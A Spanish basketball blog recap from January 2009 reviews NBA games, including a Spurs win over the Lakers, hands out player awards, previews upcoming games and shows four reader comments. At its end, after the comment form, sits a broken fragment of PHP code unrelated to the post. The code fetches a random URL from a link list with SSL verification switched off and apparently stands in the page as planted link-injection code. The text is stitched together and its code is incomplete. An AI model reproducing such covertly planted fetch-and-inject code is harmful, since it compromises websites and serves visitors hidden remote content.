La Crónica (14/01/2009)

15 de January de 2009 por txusma

Que levante la mano todos aquellos que dudaron de los Spurs a principio de temporada y que no se esconda nadie. Yo confieso que también dudé. Pensé que una gran historia llegaba a su fin y que durante la temporada podríamos ver el desmembramiento de un equipo histórico, pero nada más lejos de la realidad. Anoche los Spurs se impusieron al, hasta ayer, mejor equipo de la NBA y se situaron segundos del Oeste con ganas de seguir escalando peldaños. El partido fue un tanto atípico. En contra de lo que cabe esperar de un equipo de Popovich los tejanos anotaron más de 30 puntos en los primeros 3 cuartos pero a la vez encajaron muchas más canastas de las acostumbradas. De esta manera llegaron a tener una ventaja de 11 puntos en el último cuarto pero una brillante reacción de los Lakers les dejó 2 puntos abajo tras un triple de Kobe a 12 segundos para el final. En ese momento apareció una de las revelaciones del año, Roger Mason,  que anotó la canasta y el tiro libre adicional tras falta de Derek Fisher que daba la victoria a San Antonio. Como nos gustan estos partidos.

Otro de los favoritos, los Celtics abusaron de los Nets y poco a poco intentan recuperar las sensaciones que perdieron en aquella racha infame de hace unos días. Los Hornets, en su habitual irregularidad,  también ganaron pero ellos a un rival de mayor entidad como son los Mavs de Dirk Nowitzki. Chris Paul volvió a pasar la mano por la cara a Jason Kidd y consiguió un triple doble que a punto estuvo de convertirse en cuádruple porque robó nada más y nada menos que 7 balones.

Las sorpresas más sonadas, la derrota de los Pistons en Indiana en un acto de justicia para Danny Granger y el resto de los Pacers y sobretodo, la derrota de Utah en la cancha de los Thunder. Estaba vez Okur y Kirilenko no estuvieron finos y enfrente se encontraron a un equipo que poco a poco ha confeccionado una plantilla muy interesante. La llegada de Krstic, que parece estar en buena forma, y el gran rendimiento de Westbrook les ha permitido dar un importante paso adelante y estar en condiciones de enfrentarse a cualquiera.

Del resto de la jornada destacar que los Bucks han salido de puestos de Playoffs tras su derrota frente a los Heat y la victoria de Philadelphia frente a Portland. Rudy no jugó por un problema en el pie y es duda también para el siguiente partido. Otro equipo metido en la lucha, los Bulls, ganó a unos Raptors que siguen sin contar con Calderón pero que tienen a un Bargnani en un esplenderoso estado de forma.

Y finalmente, los equipos medicina jugaron entre ellos con victorias de Kings y Knicks frente a Warriors y Wizards respectivamente y los Hawks recibieron su inyección de moral frente a unos apáticos Clippers.

PREMIOS

MVP: Ya avisábamos en la crónica de ayer que Chris Paul era el jugador a seguir la pasada madrugada. Y lo fue. CP3 se quedó a tres recuperaciones de lograr un cuádruple-doble y finiquitó a los Mavs con 33 puntos, 11 asistencias, 10 rebotes y 7 recuperaciones. Descomunal. Una mención especial se merece Brad Miller, que en la orgia anotadora que resultó el Kings-Warriors logró 30 puntos y 22 rebotes, así como su compañero John Salmons, que además de hacer 25 puntos, 14 rebotes y 7 asistencias, anotó la canasta de la victoria que evitó una cuarta prórroga.

El rookie: Hacía algunas semanas que no veíamos a un Derrick Rose tan dominante como el de anoche. 25 puntos, 17 de ellos en el último periodo, y 10 asistencias obtuvo el número 1 del pasado draft para conducir a sus Bulls a la victoria.

La sorpresa: Sabemos de las dotes anotadoras de Daequan Cook, pero sorprende que sea el máximo anotador de los Heat. Y sobre todo sorprende que Wade fuese el cuarto máximo anotador de su equipo por detrás de Cook, Beasley y Haslem. Y que, aun así, los Heat ganasen en Milwaukee.

La decepción: En su primera oportunidad de disputar muchos minutos gracias a la baja de Rudy Fernández, Jerryd Bayless falló 10 de sus 11 tiros de campo, no repartió ninguna asistencia y perdió 2 balones. Aunque encontramos un caso más grave: Vince Carter hizo 1 de 10 en tiros, 4 puntos, 1 asistencia, 4 pérdidas sin robos, ni tapones ni rebotes. Los problemas físicos que arrastra no justifican una actuación tan desastrosa para un jugador de su calibre.

El mayor esfuerzo en vano: La mayor anotación como profesional de un inconmensurable Bargnani no sirvió para que los Raptors ganaran a Chicago. 31 puntos, con 10 de 14 en tiros, y 10 rebotes consiguió el italiano. Tampoco sirvieron para ganar los 30 puntos, 9 rebotes y 6 asistencias de Rodney Stuckey, ni el segundo partido consecutivo de más de 30 puntos de Nick Young.

droseraptorsPara la próxima madrugada, nuestras razones para trasnochar son…

Suns @ Denver. Sin Carmelo, pero aun así en un gran momento de forma, los Nuggets recibirán a los Suns. El duelo Nash-Billups es de lo mejor que se puede ver en cuanto a liderazgo y dirección de juego. Por dentro, Shaq y Amare deberían marcar diferencias ante Nene, Andersen y Martin. ¿Se recuperará JR de su reciente 1 de 14 en tiros? Por mucho que ambos equipos se hayan propuesto defender más y mejor, el duelo promete puntos y espectáculo. A partir de las 4:30 de la madrugada, hora peninsular.

El jugador que conviene seguir de cerca hoy es… Derrick Rose. Esta pasada noche se ha salido en Toronto y ante los Cavs tendrá que volver a hacerlo si los Bulls quieren plantar cara al equipo con menos derrotas de la liga. A las 2:00 horas.

Os dejamos con las 10 mejores jugadas de la noche.

La pregunta del día es: ¿Alguno de vosotros sabía que Terry es capaz de hacer lo de la jugada nº7?

Comenta

4 comentarios a esta entrada

  1. couxe dice:
    #1

    Vamos a ver, no perdamos la perspectiva… Ayer San Antonio ganó de uno y jugando en casa… y ganaron como ganaron… con mucha mucha suerte en los últimos 30 segundos, y repito, de uno…
    A mí particularmente, la sensación que me deja viéndoles ahora, es que a 7 partidos son claros favoritos los Lakers…
    Por cierto… Que algún buen samaritano en forma de multimillonario se lleve a Radmanovic a jugar a la liga rusa o griega por dios… o a cualquier otro lado donde no tengamos que verlo…

      Citar

  2. Txusma dice:
    #2

    No quería decir en ningun momento q SA sea el principal favorito al anillo. Lo q queria expresar es q yo incluso llegue a dudar q quedaran entre los 4 primeros del Oeste y q pudieran pasar, por ejemplo, de la primera ronda de Playoffs. Ahora mismo estaran un pasito por debajo de Lakers pero nadie puede dejar de contar con ellos.

      Citar

  3. MagicJohnson32 dice:
    #3

    En el análisis de pretemporada di a los Spurs como semifinalista de conferencia pero dando mucha guerra y sin descartarlos para nada. Los veo sólo claramente por debajo de los Lakers, pese a lo de anoche, y más o menos al nivel de los Hornets.

      Citar

  4. Viru dice:
    #4

    Partidazo el de SA vs LA, con algunos piques Kobe – Manu divertidísimos de ver para el espectador. Era de esperar que perdieran algún partido de esta gira. Y lo que les queda.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>